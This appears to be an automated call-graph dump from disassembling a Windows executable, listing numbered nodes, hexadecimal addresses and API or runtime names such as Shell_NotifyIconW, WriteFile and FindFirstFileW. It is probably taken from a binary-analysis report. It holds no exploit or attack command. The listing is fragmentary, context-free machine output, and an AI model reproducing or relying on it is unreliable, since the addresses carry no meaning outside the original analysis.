101055 563764 101055->101066 101056->101053 101059 59d081 101056->101059 101057->101066 101058 56370c 101070 563114 DeleteObject DestroyWindow Mailbox 101058->101070 101072 571070 10 API calls Mailbox 101059->101072 101064->101028 101067 59d118 101076 
56434a 101067->101076 101069->101058 101070->101066 101071->101055 101072->101066 101073->101040 101074->101053 101075->101067 101077 564375 _memset 101076->101077 101090 564182 101077->101090 101080 5643fa 101082 564414 Shell_NotifyIconW 101080->101082 101083 564430 Shell_NotifyIconW 101080->101083 101084 564422 101082->101084 101083->101084 101094 56407c 101084->101094 101086 564429 101086->101064 101087->101055 101088->101064 101089->101045 101091 564196 101090->101091 101092 59d423 101090->101092 101091->101080 101116 5c2f94 62 API calls _W_store_winword 101091->101116 101092->101091 101093 59d42c DestroyIcon 101092->101093 101093->101091 101095 56416f Mailbox 101094->101095 101096 564098 101094->101096 101095->101086 101117 567a16 101096->101117 101099 59d3c8 LoadStringW 101103 59d3e2 101099->101103 101100 5640b3 101101 567bcc 59 API calls 101100->101101 101102 5640c8 101101->101102 101102->101103 101104 5640d9 101102->101104 101105 567b2e 59 API calls 101103->101105 101106 564174 101104->101106 101107 5640e3 101104->101107 101110 59d3ec 101105->101110 101131 568047 101106->101131 101122 567b2e 101107->101122 101113 5640ed _memset _wcscpy 101110->101113 101135 567cab 101110->101135 101112 59d40e 101114 567cab 59 API calls 101112->101114 101115 564155 Shell_NotifyIconW 101113->101115 101114->101113 101115->101095 101116->101080 101118 580db6 Mailbox 59 API calls 101117->101118 101119 567a3b 101118->101119 101120 568029 59 API calls 101119->101120 101121 5640a6 101120->101121 101121->101099 101121->101100 101123 59ec6b 101122->101123 101124 567b40 101122->101124 101148 5b7bdb 59 API calls _memmove 101123->101148 101142 567a51 101124->101142 101127 567b4c 101127->101113 101128 59ec75 101129 568047 59 API calls 101128->101129 101130 59ec7d Mailbox 101129->101130 101132 568052 101131->101132 101133 56805a 101131->101133 101149 567f77 59 API calls 2 library calls 101132->101149 101133->101113 101136 59ed4a 101135->101136 101137 567cbf 101135->101137 101139 568029 59 
API calls 101136->101139 101150 567c50 101137->101150 101141 59ed55 __NMSG_WRITE _memmove 101139->101141 101140 567cca 101140->101112 101143 567a5f 101142->101143 101147 567a85 _memmove 101142->101147 101144 580db6 Mailbox 59 API calls 101143->101144 101143->101147 101145 567ad4 101144->101145 101146 580db6 Mailbox 59 API calls 101145->101146 101146->101147 101147->101127 101148->101128 101149->101133 101151 567c5f __NMSG_WRITE 101150->101151 101152 567c70 _memmove 101151->101152 101153 568029 59 API calls 101151->101153 101152->101140 101154 59ed07 _memmove 101153->101154 101155 5a416f 101159 5b5fe6 101155->101159 101157 5a417a 101158 5b5fe6 85 API calls 101157->101158 101158->101157 101164 5b6020 101159->101164 101167 5b5ff3 101159->101167 101160 5b6022 101189 569328 84 API calls Mailbox 101160->101189 101161 5b6027 101170 569837 101161->101170 101164->101157 101166 567b2e 59 API calls 101166->101164 101167->101160 101167->101161 101167->101164 101168 5b601a 101167->101168 101188 5695a0 59 API calls _wcsstr 101168->101188 101171 569851 101170->101171 101183 56984b 101170->101183 101172 59f5d3 __i64tow 101171->101172 101173 569899 101171->101173 101175 569857 __itow 101171->101175 101179 59f4da 101171->101179 101194 583698 83 API calls 3 library calls 101173->101194 101178 580db6 Mailbox 59 API calls 101175->101178 101176 59f552 Mailbox _wcscpy 101195 583698 83 API calls 3 library calls 101176->101195 101180 569871 101178->101180 101179->101176 101181 580db6 Mailbox 59 API calls 101179->101181 101180->101183 101190 567de1 101180->101190 101185 59f51f 101181->101185 101183->101166 101184 580db6 Mailbox 59 API calls 101186 59f545 101184->101186 101185->101184 101186->101176 101187 567de1 59 API calls 101186->101187 101187->101176 101188->101164 101189->101161 101191 567df0 __NMSG_WRITE _memmove 101190->101191 101192 580db6 Mailbox 59 API calls 101191->101192 101193 567e2e 101192->101193 101193->101183 101194->101175 101195->101172 101196 59fdfc 101201 56ab30 Mailbox 
_memmove 101196->101201 101200 580db6 59 API calls Mailbox 101200->101201 101201->101200 101202 56b525 101201->101202 101220 56a057 101201->101220 101223 567de1 59 API calls 101201->101223 101226 569f37 Mailbox 101201->101226 101230 56b2b6 101201->101230 101233 5a086a 101201->101233 101235 5a0878 101201->101235 101237 5a085c 101201->101237 101238 56b21c 101201->101238 101242 5b6e8f 59 API calls 101201->101242 101245 5ddf37 101201->101245 101248 5ddf23 101201->101248 101253 569ea0 101201->101253 101277 569c90 59 API calls Mailbox 101201->101277 101281 5dc193 85 API calls 2 library calls 101201->101281 101282 5dc2e0 96 API calls Mailbox 101201->101282 101283 5c7956 59 API calls Mailbox 101201->101283 101284 5dbc6b 331 API calls Mailbox 101201->101284 101285 5b617e 59 API calls Mailbox 101201->101285 101287 5c9e4a 89 API calls 4 library calls 101202->101287 101205 56b47a 101206 5a09e5 101205->101206 101207 5a0055 101205->101207 101293 5c9e4a 89 API calls 4 library calls 101206->101293 101286 5c9e4a 89 API calls 4 library calls 101207->101286 101211 56b475 101216 568047 59 API calls 101211->101216 101212 580db6 59 API calls Mailbox 101212->101226 101213 568047 59 API calls 101213->101226 101214 5a0064 101216->101220 101219 567667 59 API calls 101219->101226 101221 582d40 67 API calls __cinit 101221->101226 101222 5b6e8f 59 API calls 101222->101226 101223->101201 101224 5a09d6 101292 5c9e4a 89 API calls 4 library calls 101224->101292 101226->101205 101226->101207 101226->101211 101226->101212 101226->101213 101226->101219 101226->101220 101226->101221 101226->101222 101226->101224 101227 56a55a 101226->101227 101251 56c8c0 331 API calls 2 library calls 101226->101251 101252 56b900 60 API calls Mailbox 101226->101252 101291 5c9e4a 89 API calls 4 library calls 101227->101291 101280 56f6a3 331 API calls 101230->101280 101289 569c90 59 API calls Mailbox 101233->101289 101290 5c9e4a 89 API calls 4 library calls 101235->101290 101237->101220 101288 5b617e 59 API calls Mailbox 
584a74 102466->102471 102468 5846e6 __filbuf 58 API calls 102467->102468 102467->102471 102469 584a6d 102468->102469 102511 58d886 102469->102511 102472 590b77 102471->102472 102473 590b84 102472->102473 102475 585371 102472->102475 102474 582d55 _free 58 API calls 102473->102474 102473->102475 102474->102475 102476 5846e6 102475->102476 102477 5846f0 102476->102477 102478 584705 102476->102478 102621 588b28 58 API calls __getptd_noexit 102477->102621 102478->102459 102480 5846f5 102622 588db6 9 API calls __filbuf 102480->102622 102482 584700 102482->102459 102484 590a0e _fprintf 102483->102484 102485 590a1b 102484->102485 102486 590a32 102484->102486 102638 588af4 58 API calls __getptd_noexit 102485->102638 102488 590abd 102486->102488 102490 590a42 102486->102490 102643 588af4 58 API calls __getptd_noexit 102488->102643 102489 590a20 102639 588b28 58 API calls __getptd_noexit 102489->102639 102493 590a6a 102490->102493 102494 590a60 102490->102494 102496 58d206 ___lock_fhandle 59 API calls 102493->102496 102640 588af4 58 API calls __getptd_noexit 102494->102640 102495 590a65 102644 588b28 58 API calls __getptd_noexit 102495->102644 102498 590a70 102496->102498 102501 590a8e 102498->102501 102502 590a83 102498->102502 102500 590ac9 102645 588db6 9 API calls __filbuf 102500->102645 102641 588b28 58 API calls __getptd_noexit 102501->102641 102623 590add 102502->102623 102505 590a27 _fprintf 102505->102461 102507 590a89 102642 590ab5 LeaveCriticalSection __unlock_fhandle 102507->102642 102509->102452 102510->102451 102512 58d892 _fprintf 102511->102512 102513 58d89f 102512->102513 102514 58d8b6 102512->102514 102612 588af4 58 API calls __getptd_noexit 102513->102612 102515 58d955 102514->102515 102517 58d8ca 102514->102517 102618 588af4 58 API calls __getptd_noexit 102515->102618 102520 58d8e8 102517->102520 102521 58d8f2 102517->102521 102519 58d8a4 102613 588b28 58 API calls __getptd_noexit 102519->102613 102614 588af4 58 API calls __getptd_noexit 102520->102614 
102539 58d206 102521->102539 102522 58d8ed 102619 588b28 58 API calls __getptd_noexit 102522->102619 102526 58d8f8 102528 58d90b 102526->102528 102529 58d91e 102526->102529 102548 58d975 102528->102548 102615 588b28 58 API calls __getptd_noexit 102529->102615 102530 58d961 102620 588db6 9 API calls __filbuf 102530->102620 102534 58d8ab _fprintf 102534->102471 102535 58d917 102617 58d94d LeaveCriticalSection __unlock_fhandle 102535->102617 102536 58d923 102616 588af4 58 API calls __getptd_noexit 102536->102616 102540 58d212 _fprintf 102539->102540 102541 58d261 EnterCriticalSection 102540->102541 102543 589c0b __lock 58 API calls 102540->102543 102542 58d287 _fprintf 102541->102542 102542->102526 102544 58d237 102543->102544 102545 58d24f 102544->102545 102546 589e2b __ioinit InitializeCriticalSectionAndSpinCount 102544->102546 102547 58d28b ___lock_fhandle LeaveCriticalSection 102545->102547 102546->102545 102547->102541 102549 58d982 __ftell_nolock 102548->102549 102550 58d9e0 102549->102550 102551 58d9c1 102549->102551 102595 58d9b6 102549->102595 102555 58da38 102550->102555 102556 58da1c 102550->102556 102553 588af4 __dosmaperr 58 API calls 102551->102553 102552 58c5f6 __cftoe2_l 6 API calls 102557 58e1d6 102552->102557 102554 58d9c6 102553->102554 102558 588b28 __filbuf 58 API calls 102554->102558 102559 58da51 102555->102559 102562 5918c1 __lseeki64_nolock 60 API calls 102555->102562 102560 588af4 __dosmaperr 58 API calls 102556->102560 102557->102535 102561 58d9cd 102558->102561 102563 595c6b __flswbuf 58 API calls 102559->102563 102564 58da21 102560->102564 102565 588db6 __filbuf 9 API calls 102561->102565 102562->102559 102566 58da5f 102563->102566 102567 588b28 __filbuf 58 API calls 102564->102567 102565->102595 102568 58ddb8 102566->102568 102573 5899ac __beginthreadex 58 API calls 102566->102573 102569 58da28 102567->102569 102570 58e14b WriteFile 102568->102570 102571 58ddd6 102568->102571 102572 588db6 __filbuf 9 API calls 102569->102572 102574 58ddab 
GetLastError 102570->102574 102605 58dd78 102570->102605 102575 58defa 102571->102575 102578 58ddec 102571->102578 102572->102595 102576 58da8b GetConsoleMode 102573->102576 102574->102605 102591 58dfef 102575->102591 102593 58df05 102575->102593 102576->102568 102577 58daca 102576->102577 102577->102568 102580 58dada GetConsoleCP 102577->102580 102581 58de5b WriteFile 102578->102581 102585 58e184 102578->102585 102579 588b28 __filbuf 58 API calls 102583 58e1b2 102579->102583 102580->102585 102610 58db09 102580->102610 102581->102574 102582 58de98 102581->102582 102582->102578 102587 58debc 102582->102587 102588 588af4 __dosmaperr 58 API calls 102583->102588 102584 58ded8 102589 58e17b 102584->102589 102590 58dee3 102584->102590 102585->102579 102585->102595 102586 58df6a WriteFile 102586->102574 102594 58dfb9 102586->102594 102587->102605 102588->102595 102597 588b07 __dosmaperr 58 API calls 102589->102597 102596 588b28 __filbuf 58 API calls 102590->102596 102591->102585 102592 58e064 WideCharToMultiByte 102591->102592 102592->102574 102603 58e0ab 102592->102603 102593->102585 102593->102586 102594->102587 102594->102593 102594->102605 102595->102552 102599 58dee8 102596->102599 102597->102595 102598 58e0b3 WriteFile 102601 58e106 GetLastError 102598->102601 102598->102603 102602 588af4 __dosmaperr 58 API calls 102599->102602 102600 5835f5 __write_nolock 58 API calls 102600->102610 102601->102603 102602->102595 102603->102587 102603->102591 102603->102598 102603->102605 102604 597a5e WriteConsoleW CreateFileW __putwch_nolock 102609 58dc5f 102604->102609 102605->102584 102605->102585 102605->102595 102606 5962ba 60 API calls __write_nolock 102606->102610 102607 58dbf2 WideCharToMultiByte 102607->102605 102608 58dc2d WriteFile 102607->102608 102608->102574 102608->102609 102609->102574 102609->102604 102609->102605 102609->102610 102611 58dc87 WriteFile 102609->102611 102610->102600 102610->102605 102610->102606 102610->102607 102610->102609 102611->102574 
102611->102609 102612->102519 102613->102534 102614->102522 102615->102536 102616->102535 102617->102534 102618->102522 102619->102530 102620->102534 102621->102480 102622->102482 102646 58d4c3 102623->102646 102625 590b41 102659 58d43d 59 API calls 2 library calls 102625->102659 102627 590aeb 102627->102625 102629 58d4c3 __lseeki64_nolock 58 API calls 102627->102629 102637 590b1f 102627->102637 102628 590b49 102634 590b6b 102628->102634 102660 588b07 58 API calls 2 library calls 102628->102660 102631 590b16 102629->102631 102630 58d4c3 __lseeki64_nolock 58 API calls 102632 590b2b CloseHandle 102630->102632 102635 58d4c3 __lseeki64_nolock 58 API calls 102631->102635 102632->102625 102636 590b37 GetLastError 102632->102636 102634->102507 102635->102637 102636->102625 102637->102625 102637->102630 102638->102489 102639->102505 102640->102495 102641->102507 102642->102505 102643->102495 102644->102500 102645->102505 102647 58d4ce 102646->102647 102648 58d4e3 102646->102648 102649 588af4 __dosmaperr 58 API calls 102647->102649 102651 588af4 __dosmaperr 58 API calls 102648->102651 102653 58d508 102648->102653 102650 58d4d3 102649->102650 102652 588b28 __filbuf 58 API calls 102650->102652 102654 58d512 102651->102654 102655 58d4db 102652->102655 102653->102627 102656 588b28 __filbuf 58 API calls 102654->102656 102655->102627 102657 58d51a 102656->102657 102658 588db6 __filbuf 9 API calls 102657->102658 102658->102655 102659->102628 102660->102634 102662 591940 __ftell_nolock 102661->102662 102663 58079e GetLongPathNameW 102662->102663 102664 567bcc 59 API calls 102663->102664 102665 5672bd 102664->102665 102666 56700b 102665->102666 102667 567667 59 API calls 102666->102667 102668 56701d 102667->102668 102669 564750 60 API calls 102668->102669 102670 567028 102669->102670 102671 567033 102670->102671 102672 59e885 102670->102672 102674 563f74 59 API calls 102671->102674 102678 59e89f 102672->102678 102719 567908 61 API calls 102672->102719 102675 56703f 102674->102675 
102713 5634c2 102675->102713 102677 567052 Mailbox 102677->101864 102680 564ddd 136 API calls 102679->102680 102681 56688f 102680->102681 102682 59e031 102681->102682 102683 564ddd 136 API calls 102681->102683 102684 5c955b 122 API calls 102682->102684 102685 5668a3 102683->102685 102686 59e046 102684->102686 102685->102682 102689 5668ab 102685->102689 102687 59e04a 102686->102687 102688 59e067 102686->102688 102690 564e4a 84 API calls 102687->102690 102691 580db6 Mailbox 59 API calls 102688->102691 102692 5668b7 102689->102692 102693 59e052 102689->102693 102690->102693 102712 59e0ac Mailbox 102691->102712 102720 566a8c 102692->102720 102836 5c42f8 90 API calls _wprintf 102693->102836 102696 59e060 102696->102688 102698 59e260 102699 582d55 _free 58 API calls 102698->102699 102700 59e268 102699->102700 102701 564e4a 84 API calls 102700->102701 102706 59e271 102701->102706 102705 582d55 _free 58 API calls 102705->102706 102706->102705 102708 564e4a 84 API calls 102706->102708 102838 5bf7a1 89 API calls 4 library calls 102706->102838 102708->102706 102709 567de1 59 API calls 102709->102712 102712->102698 102712->102706 102712->102709 102813 5bf73d 102712->102813 102816 5c737f 102712->102816 102822 56750f 102712->102822 102830 56735d 102712->102830 102837 5bf65e 61 API calls 2 library calls 102712->102837 102714 5634d4 102713->102714 102718 5634f3 _memmove 102713->102718 102716 580db6 Mailbox 59 API calls 102714->102716 102715 580db6 Mailbox 59 API calls 102717 56350a 102715->102717 102716->102718 102717->102677 102718->102715 102719->102672 102721 566ab5 102720->102721 102722 59e41e 102720->102722 102844 5657a6 60 API calls Mailbox 102721->102844 102911 5bf7a1 89 API calls 4 library calls 102722->102911 102725 59e431 102912 5bf7a1 89 API calls 4 library calls 102725->102912 102726 566ad7 102845 5657f6 67 API calls 102726->102845 102728 566aec 102728->102725 102729 566af4 102728->102729 102731 567667 59 API calls 102729->102731 102733 566b00 102731->102733 102732 
59e44d 102735 566b61 102732->102735 102846 580957 60 API calls __ftell_nolock 102733->102846 102737 566b6f 102735->102737 102738 59e460 102735->102738 102736 566b0c 102739 567667 59 API calls 102736->102739 102741 567667 59 API calls 102737->102741 102740 565c6f CloseHandle 102738->102740 102743 566b18 102739->102743 102744 59e46c 102740->102744 102742 566b78 102741->102742 102745 567667 59 API calls 102742->102745 102746 564750 60 API calls 102743->102746 102747 564ddd 136 API calls 102744->102747 102748 566b81 102745->102748 102749 566b26 102746->102749 102750 59e488 102747->102750 102849 56459b 102748->102849 102847 565850 ReadFile SetFilePointerEx 102749->102847 102751 59e4b1 102750->102751 102754 5c955b 122 API calls 102750->102754 102913 5bf7a1 89 API calls 4 library calls 102751->102913 102758 59e4a4 102754->102758 102755 566b98 102759 567b2e 59 API calls 102755->102759 102757 566b52 102848 565aee SetFilePointerEx SetFilePointerEx 102757->102848 102762 59e4cd 102758->102762 102763 59e4ac 102758->102763 102764 566ba9 SetCurrentDirectoryW 102759->102764 102760 59e4c8 102768 566d0c Mailbox 102760->102768 102766 564e4a 84 API calls 102762->102766 102765 564e4a 84 API calls 102763->102765 102770 566bbc Mailbox 102764->102770 102765->102751 102767 59e4d2 102766->102767 102769 580db6 Mailbox 59 API calls 102767->102769 102839 5657d4 102768->102839 102775 59e506 102769->102775 102772 580db6 Mailbox 59 API calls 102770->102772 102774 566bcf 102772->102774 102773 563bbb 102773->101730 102773->101754 102776 56522e 59 API calls 102774->102776 102777 56750f 59 API calls 102775->102777 102802 566bda Mailbox __NMSG_WRITE 102776->102802 102810 59e54f Mailbox 102777->102810 102778 566ce7 102907 565c6f 102778->102907 102780 59e740 102916 5c72df 59 API calls Mailbox 102780->102916 102782 566cf3 SetCurrentDirectoryW 102782->102768 102785 59e762 102917 5dfbce 59 API calls 2 library calls 102785->102917 102788 59e76f 102790 582d55 _free 58 API calls 102788->102790 102789 59e7d9 
102920 5bf7a1 89 API calls 4 library calls 102789->102920 102790->102768 102793 56750f 59 API calls 102793->102810 102794 59e7f2 102794->102778 102795 59e7d1 102919 5bf5f7 59 API calls 4 library calls 102795->102919 102797 567de1 59 API calls 102797->102802 102801 5bf73d 59 API calls 102801->102810 102802->102778 102802->102789 102802->102795 102802->102797 102900 56586d 67 API calls _wcscpy 102802->102900 102901 566f5d GetStringTypeW 102802->102901 102902 566ecc 60 API calls __wcsnicmp 102802->102902 102903 566faa GetStringTypeW __NMSG_WRITE 102802->102903 102904 58363d GetStringTypeW _iswctype 102802->102904 102905 5668dc 165 API calls 3 library calls 102802->102905 102906 567213 59 API calls Mailbox 102802->102906 102803 567de1 59 API calls 102803->102810 102804 5c737f 59 API calls 102804->102810 102807 59e792 102918 5bf7a1 89 API calls 4 library calls 102807->102918 102809 59e7ab 102811 582d55 _free 58 API calls 102809->102811 102810->102780 102810->102793 102810->102801 102810->102803 102810->102804 102810->102807 102914 5bf65e 61 API calls 2 library calls 102810->102914 102915 567213 59 API calls Mailbox 102810->102915 102812 59e7be 102811->102812 102812->102768 102814 580db6 Mailbox 59 API calls 102813->102814 102815 5bf76d _memmove 102814->102815 102815->102712 102817 5c738a 102816->102817 102818 580db6 Mailbox 59 API calls 102817->102818 102819 5c73a1 102818->102819 102820 5c73b0 102819->102820 102821 567de1 59 API calls 102819->102821 102820->102712 102821->102820 102823 5675af 102822->102823 102827 567522 _memmove 102822->102827 102825 580db6 Mailbox 59 API calls 102823->102825 102824 580db6 Mailbox 59 API calls 102826 567529 102824->102826 102825->102827 102828 580db6 Mailbox 59 API calls 102826->102828 102829 567552 102826->102829 102827->102824 102828->102829 102829->102712 102831 567370 102830->102831 102835 56741e 102830->102835 102833 580db6 Mailbox 59 API calls 102831->102833 102834 5673a2 102831->102834 102832 580db6 59 API calls Mailbox 
102832->102834 102833->102834 102834->102832 102834->102835 102835->102712 102836->102696 102837->102712 102838->102706 102840 565c6f CloseHandle 102839->102840 102841 5657dc Mailbox 102840->102841 102842 565c6f CloseHandle 102841->102842 102843 5657eb 102842->102843 102843->102773 102844->102726 102845->102728 102846->102736 102847->102757 102848->102735 102850 567667 59 API calls 102849->102850 102851 5645b1 102850->102851 102852 567667 59 API calls 102851->102852 102853 5645b9 102852->102853 102854 567667 59 API calls 102853->102854 102855 5645c1 102854->102855 102856 567667 59 API calls 102855->102856 102857 5645c9 102856->102857 102858 59d4d2 102857->102858 102859 5645fd 102857->102859 102860 568047 59 API calls 102858->102860 102861 56784b 59 API calls 102859->102861 102862 59d4db 102860->102862 102863 56460b 102861->102863 102864 567d8c 59 API calls 102862->102864 102865 567d2c 59 API calls 102863->102865 102868 564640 102864->102868 102866 564615 102865->102866 102866->102868 102869 56784b 59 API calls 102866->102869 102867 564680 102870 56784b 59 API calls 102867->102870 102868->102867 102871 56465f 102868->102871 102881 59d4fb 102868->102881 102872 564636 102869->102872 102874 564691 102870->102874 102873 5679f2 59 API calls 102871->102873 102876 567d2c 59 API calls 102872->102876 102878 564669 102873->102878 102879 5646a3 102874->102879 102882 568047 59 API calls 102874->102882 102875 59d5cb 102877 567bcc 59 API calls 102875->102877 102876->102868 102895 59d588 102877->102895 102878->102867 102886 56784b 59 API calls 102878->102886 102880 5646b3 102879->102880 102883 568047 59 API calls 102879->102883 102885 5646ba 102880->102885 102887 568047 59 API calls 102880->102887 102881->102875 102884 59d5b4 102881->102884 102894 59d532 102881->102894 102882->102879 102883->102880 102884->102875 102890 59d59f 102884->102890 102888 568047 59 API calls 102885->102888 102897 5646c1 Mailbox 102885->102897 102886->102867 102887->102885 102888->102897 102889 5679f2 59 
API calls 102889->102895 102893 567bcc 59 API calls 102890->102893 102891 59d590 102892 567bcc 59 API calls 102891->102892 102892->102895 102893->102895 102894->102891 102898 59d57b 102894->102898 102895->102867 102895->102889 102921 567924 59 API calls 2 library calls 102895->102921 102897->102755 102899 567bcc 59 API calls 102898->102899 102899->102895 102900->102802 102901->102802 102902->102802 102903->102802 102904->102802 102905->102802 102906->102802 102908 565c88 102907->102908 102909 565c79 102907->102909 102908->102909 102910 565c8d CloseHandle 102908->102910 102909->102782 102910->102909 102911->102725 102912->102732 102913->102760 102914->102810 102915->102810 102916->102785 102917->102788 102918->102809 102919->102789 102920->102794 102921->102895 102923 566d95 102922->102923 102924 566ea9 102922->102924 102923->102924 102925 580db6 Mailbox 59 API calls 102923->102925 102924->101870 102927 566dbc 102925->102927 102926 580db6 Mailbox 59 API calls 102928 566e31 102926->102928 102927->102926 102928->102924 102930 56735d 59 API calls 102928->102930 102932 56750f 59 API calls 102928->102932 102935 566240 102928->102935 102960 5b6553 59 API calls Mailbox 102928->102960 102930->102928 102932->102928 102933->101872 102934->101874 102936 567a16 59 API calls 102935->102936 102943 566265 102936->102943 102937 56646a 102938 56750f 59 API calls 102937->102938 102939 566484 Mailbox 102938->102939 102939->102928 102942 566799 _memmove 102966 5bf8aa 91 API calls 4 library calls 102942->102966 102943->102937 102943->102942 102944 59dff6 102943->102944 102945 56750f 59 API calls 102943->102945 102950 567d8c 59 API calls 102943->102950 102953 59df92 102943->102953 102957 567e4f 59 API calls 102943->102957 102961 565f6c 60 API calls 102943->102961 102962 565d41 59 API calls Mailbox 102943->102962 102963 565e72 60 API calls 102943->102963 102964 567924 59 API calls 2 library calls 102943->102964 102965 5bf8aa 91 API calls 4 library calls 102944->102965 102945->102943 
102948 59e004 102951 56750f 59 API calls 102948->102951 102950->102943 102952 59e01a 102951->102952 102952->102939 102954 568029 59 API calls 102953->102954 102956 59df9d 102954->102956 102959 580db6 Mailbox 59 API calls 102956->102959 102958 56643b CharUpperBuffW 102957->102958 102958->102943 102959->102942 102960->102928 102961->102943 102962->102943 102963->102943 102964->102943 102965->102948 102966->102939 102967->101888 102968->101889 102970 56e6d5 102969->102970 102971 5a3aa9 102970->102971 102974 56e73f 102970->102974 102984 56e799 102970->102984 102972 569ea0 331 API calls 102971->102972 102973 5a3abe 102972->102973 102999 56e970 Mailbox 102973->102999 103121 5c9e4a 89 API calls 4 library calls 102973->103121 102976 567667 59 API calls 102974->102976 102974->102984 102975 567667 59 API calls 102975->102984 102978 5a3b04 102976->102978 102980 582d40 __cinit 67 API calls 102978->102980 102979 582d40 __cinit 67 API calls 102979->102984 102980->102984 102981 5a3b26 102981->101967 102982 5c9e4a 89 API calls 102982->102999 102983 5684c0 69 API calls 102983->102999 102984->102975 102984->102979 102984->102981 102986 56e95a 102984->102986 102984->102999 102985 569ea0 331 API calls 102985->102999 102986->102999 103122 5c9e4a 89 API calls 4 library calls 102986->103122 102988 568d40 59 API calls 102988->102999 102996 56f195 103126 5c9e4a 89 API calls 4 library calls 102996->103126 102997 5a3e25 102997->101967 102998 56ea78 102998->101967 102999->102982 102999->102983 102999->102985 102999->102988 102999->102996 102999->102998 103120 567f77 59 API calls 2 library calls 102999->103120 103123 5b6e8f 59 API calls 102999->103123 103124 5dc5c3 331 API calls 102999->103124 103125 5db53c 331 API calls Mailbox 102999->103125 103127 569c90 59 API calls Mailbox 102999->103127 103128 5d93c6 331 API calls Mailbox 102999->103128 103001 56f650 103000->103001 103002 56f4ba 103000->103002 103005 567de1 59 API calls 103001->103005 103003 56f4c6 103002->103003 103004 5a441e 
103002->103004 103221 56f290 331 API calls 2 library calls 103003->103221 103223 5dbc6b 331 API calls Mailbox 103004->103223 103011 56f58c Mailbox 103005->103011 103008 5a442c 103012 56f630 103008->103012 103224 5c9e4a 89 API calls 4 library calls 103008->103224 103010 56f4fd 103010->103008 103010->103011 103010->103012 103018 564e4a 84 API calls 103011->103018 103129 5ccb7a 103011->103129 103209 5c3c37 103011->103209 103212 5d445a 103011->103212 103012->101967 103014 56f5e3 103014->103012 103222 569c90 59 API calls Mailbox 103014->103222 103018->103014 103381 568180 103019->103381 103021 56fd3d 103023 5a472d 103021->103023 103062 5706f6 103021->103062 103386 56f234 103021->103386 103403 5c9e4a 89 API calls 4 library calls 103023->103403 103026 5a488d 103033 56fe4c 103026->103033 103084 5a4742 103026->103084 103409 5da2d9 85 API calls Mailbox 103026->103409 103027 56fe3e 103027->103026 103027->103033 103407 5b66ec 59 API calls 2 library calls 103027->103407 103028 570517 103038 580db6 Mailbox 59 API calls 103028->103038 103029 5a4b53 103029->103084 103420 5c9e4a 89 API calls 4 library calls 103029->103420 103031 580db6 59 API calls Mailbox 103061 56fdd3 103031->103061 103033->103029 103039 5a48f9 103033->103039 103390 56837c 103033->103390 103034 5a47d7 103034->103084 103405 5c9e4a 89 API calls 4 library calls 103034->103405 103035 5a4848 103408 5b60ef 59 API calls 2 library calls 103035->103408 103048 570545 _memmove 103038->103048 103049 5a4917 103039->103049 103411 5685c0 59 API calls Mailbox 103039->103411 103042 5a4755 103042->103034 103404 56f6a3 331 API calls 103042->103404 103044 56fea4 103054 56ff32 103044->103054 103055 5a4ad6 103044->103055 103077 570179 Mailbox _memmove 103044->103077 103045 5a486b 103050 569ea0 331 API calls 103045->103050 103046 5a48b2 Mailbox 103046->103033 103410 5b66ec 59 API calls 2 library calls 103046->103410 103056 580db6 Mailbox 59 API calls 103048->103056 103052 5a4928 103049->103052 103412 5685c0 59 API calls Mailbox 
103049->103412 103050->103026 103052->103077 103413 5b60ab 59 API calls Mailbox 103052->103413 103058 580db6 Mailbox 59 API calls 103054->103058 103418 5c9ae7 60 API calls 103055->103418 103065 570106 _memmove 103056->103065 103063 56ff39 103058->103063 103061->103027 103061->103028 103061->103031 103061->103042 103061->103048 103064 569ea0 331 API calls 103061->103064 103072 5a480c 103061->103072 103061->103084 103402 5c9e4a 89 API calls 4 library calls 103062->103402 103063->103062 103064->103061 103065->103077 103098 570162 103065->103098 103401 569c90 59 API calls Mailbox 103065->103401 103066 569ea0 331 API calls 103069 5a4a87 103066->103069 103067 56ffe6 103073 5684c0 69 API calls 103069->103073 103069->103084 103406 5c9e4a 89 API calls 4 library calls 103072->103406 103076 5a4ab2 103073->103076 103417 5c9e4a 89 API calls 4 library calls 103076->103417 103077->103062 103077->103076 103083 580db6 59 API calls Mailbox 103077->103083 103085 570398 103077->103085 103092 5a4a1c 103077->103092 103097 5a4a4d 103077->103097 103399 568740 68 API calls __cinit 103077->103399 103400 568660 68 API calls 103077->103400 103414 5c5937 68 API calls 103077->103414 103415 5689b3 69 API calls Mailbox 103077->103415 103416 569d3c 60 API calls Mailbox 103077->103416 103083->103077 103085->101967 103094 580db6 Mailbox 59 API calls 103092->103094 103094->103097 103097->103066 103098->101967 103099->101967 103100->101967 103101->101897 103102->101902 103103->101967 103104->101904 103105->101904 103106->101904 103107->101967 103108->101967 103109->101967 103110->101967 103111->101967 103112->101967 103113->101950 103114->101950 103115->101950 103116->101950 103117->101950 103118->101950 103119->101950 103120->102999 103121->102999 103122->102999 103123->102999 103124->102999 103125->102999 103126->102997 103127->102999 103128->102999 103130 567667 59 API calls 103129->103130 103131 5ccbaf 103130->103131 103132 567667 59 API calls 103131->103132 103133 5ccbb8 103132->103133 103134 
5ccbcc 103133->103134 103334 569b3c 59 API calls 103133->103334 103136 569837 84 API calls 103134->103136 103137 5ccbe9 103136->103137 103138 5cccea 103137->103138 103139 5ccc0b 103137->103139 103150 5ccd1a Mailbox 103137->103150 103141 564ddd 136 API calls 103138->103141 103140 569837 84 API calls 103139->103140 103143 5ccc17 103140->103143 103142 5cccfe 103141->103142 103144 5ccd16 103142->103144 103147 564ddd 136 API calls 103142->103147 103145 568047 59 API calls 103143->103145 103148 567667 59 API calls 103144->103148 103144->103150 103146 5ccc23 103145->103146 103152 5ccc69 103146->103152 103153 5ccc37 103146->103153 103147->103144 103149 5ccd4b 103148->103149 103151 567667 59 API calls 103149->103151 103150->103014 103156 569837 84 API calls 103152->103156 103155 568047 59 API calls 103153->103155 103158 5ccc47 103155->103158 103376 5c445a GetFileAttributesW 103209->103376 103213 569837 84 API calls 103212->103213 103214 5d4494 103213->103214 103215 566240 94 API calls 103214->103215 103216 5d44a4 103215->103216 103217 5d44c9 103216->103217 103218 569ea0 331 API calls 103216->103218 103220 5d44cd 103217->103220 103380 569a98 59 API calls Mailbox 103217->103380 103218->103217 103220->103014 103221->103010 103222->103014 103223->103008 103224->103012 103334->103134 103377 5c4475 FindFirstFileW 103376->103377 103379 5c3c3e 103376->103379 103378 5c448a FindClose 103377->103378 103377->103379 103378->103379 103379->103014 103380->103220 103382 56818f 103381->103382 103385 5681aa 103381->103385 103383 567e4f 59 API calls 103382->103383 103384 568197 CharUpperBuffW 103383->103384 103384->103385 103385->103021 103387 56f251 103386->103387 103388 56f272 103387->103388 103421 5c9e4a 89 API calls 4 library calls 103387->103421 103388->103061 